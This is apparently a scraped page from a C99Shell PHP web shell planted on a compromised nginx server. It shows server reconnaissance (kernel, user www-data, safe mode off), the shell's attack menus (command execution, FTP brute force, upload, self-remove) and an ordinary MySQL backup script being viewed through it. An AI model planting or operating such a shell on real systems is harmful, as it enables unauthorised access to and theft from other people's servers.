!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/automatas/   drwxrwxrwx
Free 83.36 GB of 96.73 GB (86.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     backup.php (1.62 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**Developer: Anish Karim C*[[email protected]]*****                  *     *     *
***ClassFor: MySQL Database BackUP[backup.php]***********               *   *   *
***CreatedOn: 19th November 2009*****************************             * * *
***Details: Configuration data will set to class variables******     * * *  C  * * *
************** Create an object call**************************              * * *
**************Assign Variables and call Function BackUp******            *   *   *
***Suggestions and Comments are welcome******************              *     *     *
*/

include_once("mysql.class.inc");
include_once(
"configbackup.php");

$backup    = new MyBackUp(); //creating an object of MyBackUp

//SERVER CONFIG
if(!empty($server['host']))
    
$backup->server    $server['host']; //Joining the configuration Server data to class Server variables.
if(!empty($server['port']))
    
$backup->port    $server['port'];
if(!empty(
$server['user']))
    
$backup->usern    $server['user'];

$backup->userp    $server['pass'];
$backup->dbase    $server['database'];

//Mail Config
if(!empty($mailer["FromMail"]))
    
$backup->mailFrom $mailer["FromMail"];
if(!empty(
$mailer["ToMail"]))
    
$backup->mailTo $mailer["ToMail"];

    
$backup->body $mailer["MailBody"];
    
$backup->isDel$mailer["DAM"];

//FILENAME GENERATION
//UNIQUE FILE NAME GENERATION TO SET ONE BACKUP A DAY. Change the date function to time if you need more than on file per day. 
    
$backup->filename $backUpFolder."/".$server['database']."_".date("Y_M_d").".sql";

//Calling generator Function
if(!$backup->BackUp())
    echo 
$backup->error//On error this function returns back. Error details will be in this variable.



?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0031 ]--